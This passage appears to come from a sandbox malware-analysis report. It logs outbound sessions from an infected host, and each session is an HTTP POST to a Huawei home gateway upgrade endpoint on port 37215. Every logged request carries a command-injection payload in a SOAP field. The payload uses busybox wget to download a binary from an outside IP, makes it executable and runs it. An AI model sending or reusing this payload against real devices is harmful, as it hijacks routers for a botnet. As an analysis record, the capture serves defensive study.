                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              103192.168.2.155319437.234.141.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035075903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              104192.168.2.1553362157.224.2.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035101891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              105192.168.2.1560608121.45.22.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035103083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              106192.168.2.1543158186.99.120.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035125971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              107192.168.2.155603894.177.153.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035125971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              108192.168.2.154019894.155.242.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035172939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              109192.168.2.1544338203.134.191.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035224915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              110192.168.2.1551854122.66.251.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035228968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              111192.168.2.1545698190.132.74.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035245895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              112192.168.2.1548288156.66.39.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035278082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              113192.168.2.1556638197.200.20.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035280943 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
